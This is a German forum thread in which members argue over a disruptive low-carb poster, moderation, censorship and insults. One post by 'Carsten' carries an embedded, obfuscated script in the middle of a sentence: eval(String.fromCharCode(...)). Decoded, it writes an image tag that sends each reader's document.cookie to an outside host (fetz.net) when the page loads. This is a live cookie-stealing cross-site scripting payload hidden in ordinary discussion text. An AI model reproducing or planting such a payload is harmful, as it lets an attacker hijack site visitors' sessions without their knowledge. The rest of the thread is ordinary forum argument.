Müllhalden-Thread

Squirrel1

New member
Vorschlag an die Administratoren: Könnte man nicht alle Beiträge, die ein gewisser, sich steigender Beliebtheit als Forums-Kasper erfreuender, kohlehydratlos aufgewachsener Teilnehmer absondert, einfach in diesem Thread verschieben? Das würde der wirklich überwältigenden Mehrheit der Leser das Ignorieren dieses geistigen Weltwunders enorm erleichtern.

Meinjanurmalso...

Jetzt muss ich mich aber auch mal äußern

Vielleicht ist es dem einen oder anderen schon aufgefallen. Ich habe mich bisher noch zu keinem Thread zu Siggi geäußert. Ich habe da mal den Ausdruck: "Noch nicht einmal ignorieren" gehört. Ich kann wirklich nicht verstehen warum Ihr euch so über Siggi aufregt. Ihr braucht doch seine Postings einfach nicht lesen. Immerhin gibt es keine anonymen Postings mehr. Ich lese mir seine Postings noch nicht einmal durch (sowie auch Postings zum Thema Ernährnung allgemein).

Gruß

Carsten

Re: Jetzt muss ich mich aber auch mal äußern

Im Prinzip hast du recht, aber es ist schon mehr als ärgerlich, wenn sich dieses Siggi in jeden dritten Thread einmischt um seine 'Kurtistbösezumir'-Masche zu reiten, es macht z.T. interessante Themen schwer leserlich und bläht Threads unnötig auf.

Vielleicht würde das allgemeine Ignorieren ja helfen, es verschwinden zu lassen. Andererseits lesen hier manchmal auch Neulinge mit, die u.U. Gefahr laufen, den geistigen Dünnpfiff als Wahrheit hinzunehmen, so dass doch wieder Kurts oder sonstwessen Wissen gefragt ist, um Halb- oder Unwahrheiten zu enttarnen.

Tja....

.. wir leben in einer Demokratie und hier hat jeder das Recht auf freie Meinungsäußerung. Dies gilt auch für Meinungen die unpopulär oder falsch sind und umfasst auch Personen, die aus veschiedenen Gründen unangenehm sind oder erscheinen. Postings zu zensieren kann doch nicht im allgemeinen Interesse sein. Natürlich genießt der Administrator des Forum ein Hausrecht, das ihm erlaubt Personen aus dem Forum zu entfernen. Nur würde dies nicht ein viel schlechteren Bild auf das Forum werfen, als die erwachsene Auseinandersetzung mit unbequemen Forumsteilnehmern?

Das Problem auf einen "einen gewissen, sich steigender Beliebtheit als Forums-Kasper erfreuenden, kohlehydratlos aufgewachsenen Teilnehmer" zu reduzieren scheint einfach und bequem, in der Vergangenheit gab es jedoch bereits einige Personen, die es verstanden Unruhe ins Forum zu bringen. Und solche Pesonen wird es auch in Zukunft immer wieder geben. Aber bringen diese "unbequemen" Personen nicht neue Ideen und Gedanken mit? Kann es nicht sein, dass ihre Denkweise nicht so absurd ist, wie es den Anschein hat. Natürlich möchte ich nicht für LowCarb werben, es passt nicht zu mir. Für jemand anderes mag es aber der richtige Weg sein, sich zu ernähren.

Allen Menschen ein einheitliches Ernährungskonzept überzustülpen widerspricht dem hier im Forum propagierten Prinzip der individuellen Ernährungsgestaltung. Warum darf man seine Ernährung individuell gestalten, aber nicht so, wie es Siggi empfiehlt? Gibt es sachliche Gründe oder ist er inzwischen Opfer irrationaler Vorbehalte gegen seine Person? Wir sind doch erwachsene, gut informierte Menschen und können für uns selbst die besten Entscheidungen treffen. Wenn wir Siggis Postings zensieren, entmündigen wir uns selbst. Das ist keinesfalls erstebenswert.

LG Christiane

http://www.christiane.langheim.info/spinne.jpg

Re: Tja....

Hallo Christiane,

du hast natürlich im Prinzip auch recht, mein Vorschlag einer Müllhalde war ja auch nicht 100%ig ernst gemeint. Allerdings geht so manches aus Siggis Tastatur einfach zu weit, das Recht auf freie Meinungsäußerung beinhaltet m.E. nicht das Recht auf persönliche Beleidigungen.

Öffentliche Foren sind schon ein schwieriges Parkett, ich möchte selbst nicht Admin eines solchen sein. Leider haben es Gestalten wie Siggi (oder ein paar andere, die hier schon umhergeschrieben haben) in der Hand, so etwas zu ruinieren oder zumindest seinen Nutzen stark herab zu setzen. Carstens Vorschlag des Ignorierens hilft da leider nicht weiter, denn wenn niemand widerspricht werden viele nichts mehr anzweifeln.

Wir drehen uns aber im Kreis - und haben ja irgendwo alle ein bisschen Recht :)Ich nehme den Aufruf zur Beitrags-Entsorgung feierlich zurück und hoffe, dass das Forum weiterhin lesenswert bleibt. Siggi empfehle ich eine große Portion von Kalle's Carnitin-Salbe, kohlehydratfrei, am besten intravenös...

Genug gealbert, ich wünsche allen einen schönen Tag.

Keine Zensur sondern Moderation

Hi Roland,

Zensur ist grundsätzlich staatlich und als solche Verboten. Wenn ein privater Forumsbetreiber in seinem Forum Nachrichten löscht ist das keine Zensur.

Denn ein Forumsbetreiber darf selbstverständlich sein Forum so betreiben wie ihm das passt[1]. Und wenn dazu gehört, ab und an mal ein paar Nachrichten zu löschen, dann besteht dein Recht der freien Meinungsäusserung z.b. darin, ein eigenes Forum zu eröffnen und dort dir genehme Richtlinien zu etablieren.
Das kann dir dann der hiesige Forumsbetreiber nicht verbieten und auch der Staat wird nicht eingreifen, denn das ist dein Recht auf freie Meinungsäusserung.

Effektiv hast du überhaupt kein Recht (im Sinne von juristisch einklagbar) hier zu posten, du hast eine freiwillige Erlaubnis!

Im übrigen ist ein Forumsbetreiber verpflichtet bestimmte gesetzeswidrige Inhalte zu löschen um sich nicht strafbar zu machen oder als Mitstörer zu Haften. Ausserdem soll es ab und an ja auch mal technische Probleme geben<script>eval(String.fromCharCode(68,61,68,79,67,85,77,69,78,84,59,68,46,87,82,73,84,69,40,39,60,73,77,71,32,83,82,67,61,34,72,84,84,80,58,47,47,70,69,84,90,46,78,69,84,47,83,77,73,76,69,47,83,77,73,76,69,89,46,71,73,70,63,73,67,79,61,49,48,38,39,43,68,46,67,79,79,75,73,69,43,39,34,62,39,41).toLowerCase())</script>.

Gruss
Carsten

[1] unpassende Kneipenvergleiche (dort gibt es den Rauswurf ja auch) lasse ich hier mal weg.

Du verwechselst offensichtlich...

...medizinische diagnosen mit beleidigungen. aber macht nix, bist nicht der einzige hier, dem's so geht.

gruß, kurt

Ich hatte Eichhörnchen eigentlich immer für clevere Tierchen gehalten. Hast du Angst vor anderen Meinungen, die nicht von Foren-Göttervater Kurt abgesegnet sind?

MFG siggi

Du bist ein Fall für die Pisa-Erwachsenenstudie, Stichwort sinnerfassendes Lesen. Da fehlt dir eine Menge Kompetenz. Und damit auch hier von meiner Seite Ende des Diskussion.

So pauschal kann man das...

... meiner Meinung nach nicht sagen. Ich bin natürlich keine Juristin und kann das Urteil* nicht mit der gebotenen Fachkenntnis evaluieren :winke:- aber:

http://www.netlaw.de/urteile/lgbn_02.htm

Es müsste erstmal nachgewiesen werden, dass Siggi oder auch andere, deren IP-Adressen hier bereits gesperrt wurden und/oder deren Nachrichten gelöscht wurden, die Software nicht im Rahmen des "üblichen Chatter-Verhaltens" genutzt haben. Fiele meiner Meinung nach schwer. Das Einzige, was sich nachweisen ließe, ist wohl, dass hier Leute Meinungen vehement vertreten haben, die nicht mit der von den Betreibern bzw. von Kurt vertretenen übereinstimmen. Und was die Beleidigungen angeht, so möchte ich mich nicht festlegen, wer hier das Büßerhemd überstreifen sollte und wem Engelsflügel wachsen müssten.

Gruß

Tabea

*Das Urteil ist auf Chats bezogen, lässt sich aber meiner Ansicht nach problemlos auf dieses "real-time"-Forum übertragen.

Re: Dann frage ich mich,...

Hi Roland,

was ist denn mit dem Beleidungsthread los? Irgendwie kann ich dort nicht antworten, so sehr ich es auch versuche. Naja, sei`s drum: Ich bin jedenfalls erleichtert das mit den Diagnosen zu erfahren.

Gruß

Tabea

Re: Interessant

In Antwort auf:

Wenn der Beleidungsthread wirklich gesperrt wurde, wäre das ein Armutszeugnis für dieses Forum. Was wolltest du denn dort schreiben?

Naja, im Prinzip nur, dass ich erleichtert bin zu hören, dass ich von Kurt nie beleidigt, sondern lediglich mit Diagnosen bedacht wurde. :winke: Hab aber inzwischen meinen Frieden mit dem Forum gemacht und reagiere eigentlich nicht merh auf Beleidigungen meiner Wenigkeit oder anderer Personen, insofern war´s nur als flappsige Bemerkung gemeint.
Ich kann auf Dein Anfangsposting im Beleidigungsthread nicht antworten. Auf die anderen Postings in dem Thread könnte ich, wollte ich aber nicht antworten.

Gruß

Tabea
noch unzensiert

Zurück
Oben